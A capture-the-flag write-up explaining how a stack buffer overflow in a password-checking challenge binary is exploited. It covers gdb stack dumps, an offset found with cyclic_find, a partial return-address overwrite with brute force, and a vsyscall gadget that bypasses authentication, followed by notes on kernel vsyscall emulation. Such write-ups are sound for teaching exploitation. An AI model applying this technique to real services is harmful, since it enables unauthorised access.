Welcome to the Progressive Secure Coding course! Here, you will learn how to properly secure your software without making it too slow. For example, you should use C. And compile your code for 64bit, because then you don’t need stack cookies, the pointers are random enough. Test your attack on a box with Linux >=3.4! Connect to school.fluxfingers.net:1514
This challenge provided us with the executable and the source code. Let’s analyze the binary and see what we find out:
$ file hackme
hackme: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=f46fbf9b159f6a1a31893faf7f771ca186a2ce8d, not stripped
$ checksec.sh --file hackme
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
No RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH hackme
So, we have executable stack, no canary and PIE enabled. We don’t have to decompile the executable, since we are given the source code, and we can easily find the vulnerability:
In short, our service compares the password we enter with the real password read from the file, and if the password is correct it gives us the flag. I wonder if there’s a way to skip that require_auth() function… Wait, are you sure that you really want to read 90 characters on a 50 characters buffer if the user supply a wrong password length? I thought we were here to learn secure coding, but an attacker can easily control the saved RIP and control the program flow!
Analyzing the vulnerability
The following python script will send 90 characters to the service.
To understand how many characters we have to push before the saved RIP, we’re gonna need gdb. We will use it to connect to the service just after we send the payload to analyze the stack just before the check_password_correct() function returns:
$ ps -a | grep exe
8214 pts/1 00:00:00 exe
$ sudo gdb attach 8214
gdb-peda$ disas check_password_correct
Dump of assembler code for function check_password_correct:
0x00007f4713575ed2 <+0>: sub rsp,0x58
[...]
0x00007f4713575fa8 <+214>: call 0x7f4713575c80 <strcmp@plt>
0x00007f4713575fad <+219>: test eax,eax
0x00007f4713575faf <+221>: sete al
0x00007f4713575fb2 <+224>: movzx eax,al
0x00007f4713575fb5 <+227>: add rsp,0x58
0x00007f4713575fb9 <+231>: ret
gdb-peda$ b *check_password_correct + 231
Breakpoint 1 at 0x7f4713575fb9
gdb-peda$ continue
Breakpoint 1, 0x00007f4713575fb9 in check_password_correct ()
gdb-peda$ x/10gx $rsp
0x7ffd46f25108: 0x6161617461616173 0x6161617661616175
0x7ffd46f25118: 0x00007f98631f6177 0x00000000ffffffff
0x7ffd46f25128: 0x00007ffd46f25101 0x00007ffd46f272b6
0x7ffd46f25138: 0x0000000000000000 0x00007ffd46f252c8
0x7ffd46f25148: 0x00007f98631f8469 0x00007ffd46f272b6
The first thing we notice here is that we overwrote the return address from check_password_correct with 0x6161617461616173, that is the hex for ‘aaataaas’. Using cyclic_find we can easily understand how many characters we have to write before our forged RIP:
>>> from pwn import *
>>> unhex('6161617461616173')
'aaataaas'
>>> cyclic_find('saaa')
72
So, we have to write 72 characters before the RIP. We can also notice another thing: 0x7ffd46f25118 is very similar to the return address from the require_auth() function, but with the last 2 bytes being overwritten. We can easily verify this:
gdb-peda$ disas handle_request
Dump of assembler code for function handle_request:
[...]
0x00007f98631f807a <+160>: lea rdi,[rip+0x3a7] # 0x7f98631f8428
0x00007f98631f8081 <+167>: call 0x7f98631f7bc0 <puts@plt>
0x00007f98631f8086 <+172>: call 0x7f98631f7fba <require_auth>
0x00007f98631f808b <+177>: lea rsi,[rip+0x36d] # 0x7f98631f83ff
0x00007f98631f8092 <+184>: lea rdi,[rip+0x3b6] # 0x7f98631f844f
0x00007f98631f8099 <+191>: call 0x7f98631f7cd0 <fopen@plt>
0x00007f98631f809e <+196>: mov QWORD PTR [rsp+0x40],rax
0x00007f98631f80a3 <+201>: cmp QWORD PTR [rsp+0x40],0x0
0x00007f98631f80a9 <+207>: je 0x7f98631f80c5 <handle_request+235>
[...]
Good! We’re almost there! On the stack we have 0x00007f98631f6177, and we want to return to 0x00007f98631f808b, that is, just after out require_auth() function. We know that pages are aligned, so we know that the last 12 bits of the address where we want to jump to are fixed to 0x08b. We overwrite 16 bits, so we are left with 4 unknown bits… Well, I think that a little of brute force won’t be so bad, after all. Anyway, we still have stuff on the stack (or should I say stackstuff?) that we want to get rid of. If only I could make a pop-ret here!
Looking for something useful
We know that PIE is enabled, so addresses are changing everytime, but after all we don’t need that much: pop-ret ret-ret are enough. After a few hours of digging, I found something that could easily bring us to get that damn flag. Running a couple of time the executable and mapping memory sections, I found that the vsyscall memory area had its address fixed
gdb-peda$ info proc mappings
process 8329
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x7f9862c07000 0x7f9862dc7000 0x1c0000 0x0 /lib/x86_64-linux-gnu/libc-2.21.so
[...]
0x7ffd46f80000 0x7ffd46f82000 0x2000 0x0 [vdso]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
I hope that vsyscall has what we’re looking for…
gdb-peda$ X/20i 0xffffffffff600000
0xffffffffff600000: mov rax,0x60
0xffffffffff600007: syscall
0xffffffffff600009: ret
0xffffffffff60000a: int3
0xffffffffff60000b: int3
Bingo! That’s exactly what we need: a couple of syscall, and we’re good to go. The first idea was to return twice to 0xffffffffff600009 and then to our handle_request(), just after the require_auth() call. Keep in mind that we have to bruteforce 16 bits.
After trying we noticed that using 0xffffffffff600009 as a gadget resulted in a segfault. The reason for this odd behaviour is that starting from linux kernel 3.3/3.4 the vsyscall are emulated using a trap-based mechanism see SROP, LWN, and thisissecurity for more information.
Since we just need to move further the stack to do the partial overwrite we can just call the address of time(…)/gettimeofday(…)/getcpu(…). We decided to use 0xffffffffff600000 (gettimeofday). This is possible because in di/si we have an address in a writeable memory page which contains password and input (more on this later).
And we have the flag: flag{MoRE_REtuRnY_tHAn_rop}
~ q3_C0d3
Why and how does vsyscall emulation work
The need for vsyscall emulation is as described in the resources mentioned before.
You can see in vsyscall_emu_64.S that the vsyscall page contains the gadget we need.
Though a second look at how emulate_vsyscall is executed in emulate_vsyscall(…) shows us that a few security checks are in place:
The author of this part of the kernel decided to mantain the same behaviour that a real vsyscall would have passing a wrong address, issuing a SIGSEGV if the called address is not good. Instead, as long as the ret instruction is emulated we’re good to go and our exploit will work:
addr_to_vsyscall(…) will make sure that the emulated syscall is called starting at the alignment address and be one of the three defined syscalls:
The last part left to understand how this works is how intructions in the vsyscall area are “trapped”, to do this we need to look at fault.c which is responsible of handing faults, in particular the code which handles this is in the badarea_nosemaphore function, it will check if the fault comes from an address in the vsyscall area and pass control to the emulate_vsyscall function.
Looks like there is a VMA set up for the emulated vsyscall which explain why you can see this page as r-xp in maps/trace, but the actual physical page is setup via __set_fixmap:
To explain why we are still able to read the page, but a fault gets generated by the mmu if we try to execute code from the vsyscall page in emulation mode we need to look at how vsyscall gets mapped in map_vsyscall:
Depending on the vsyscall_mode the physical page will have different permissions.
Thanks to TheJH from FluxFingers (the author of the challenge) for his help on writing this part of the writeup!
~ ocean
Let us know what you think of this article on twitter @towerofhanoi or leave a comment below!